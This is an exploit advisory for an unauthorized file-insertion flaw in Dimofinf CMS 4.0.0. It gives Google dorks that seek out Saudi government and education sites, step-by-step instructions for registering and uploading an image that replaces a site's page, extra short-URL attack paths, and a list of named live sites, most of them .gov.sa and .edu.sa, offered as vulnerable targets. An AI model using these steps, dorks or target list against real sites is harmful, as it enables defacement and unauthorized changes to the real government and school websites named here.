#################################################################################################
# Exploit Title : Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : dimofinf.net
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.0
# Google Dorks :
intext:''Powered by Dimofinf cms Version 4.0.0'' site:gov.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:edu.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org
intext:''Powered by Dimofinf cms Version 4.0.0'' site:net
intext:''Powered by Dimofinf cms Version 4.0.0'' site:org.sa
intext:''Powered by Dimofinf cms Version 4.0.0'' site:com.sa
intext: Powered by Dimofinf cms Version 4.0.0 Copyright© Dimensions Of Information Ltd.'' site:sa
inurl:''/include/plugins/news/news.php?action=save&m=news&id='' site:sa
inurl:''/content.php?action=save&m=content&id='' site:sa
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Exploit Usage :
1) Register yourself as Author [ username - password - e-mail address [ confirmation is important ]
2) /register.php?action=register
3) Approve your e-mail address. - And then you will be in the author area.
4) TARGET/profile.php?action=[YOUR-PROFILE-NUMBER] target/profile/[YOUR-PROFILE-NUMBER]
+ TARGET/register.php?action=activate&userid=[YOUR-PROFILE-NUMBER]&activid=[ACTIVATION-CODE-HERE]
5) After successful registration and confirmation - Find this word under your profile رفع صورة خلفية الغلاف Click and insert your image file.
6) Your image file will cover the whole page.
7) Directory Path : TARGET/contents/covers/[YOUR-PROFILE-NUMBER].jpg .gif .png
Note : Only this file extensions are allowed : bmp - gif - jpe - jpeg - jpg - png - tif - tiff
# Another File Insertion Exploit Usage :
Exploit :
/short_url/l
/short_url-action-l.htm
TARGET/[RANDOM-NUMBER]
TARGET/short_url-action-s-id-[RANDOM-NUMBER].htm
#################################################################################################
# Example Vulnerable Sites =>
[+] nashatghasa.edu.sa/site => [ Proof of Concept for Vulnerability ] => archive.fo/n6Qt3
[+] ssb.edu.sa - [+] alfurqan.edu.sa [+] rawdahedu.gov.sa [+] taifnashat.gov.sa [+] sukar.org.sa
[+] sufayri.gov.sa/news [+] ulaedu.gov.sa/inf [+] msi.gov.sa/ar [+] nre.gov.sa [+] darco.sa
[+] albosor-m.gov.sa [+] al-7b.com [+] aldukhainy.com [+] khadegah.com [+] elshal.com
[+] seen.com.sa [+] arabfp.org [+] neprass.org [+] albrbalasmer.org [+] jobs-ksa.net [+] faifaedu.net
[+] arabsea.com.sa [+] sadaalma.com.sa [+] tanmiah9.org.sa [+] sadawan.com
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################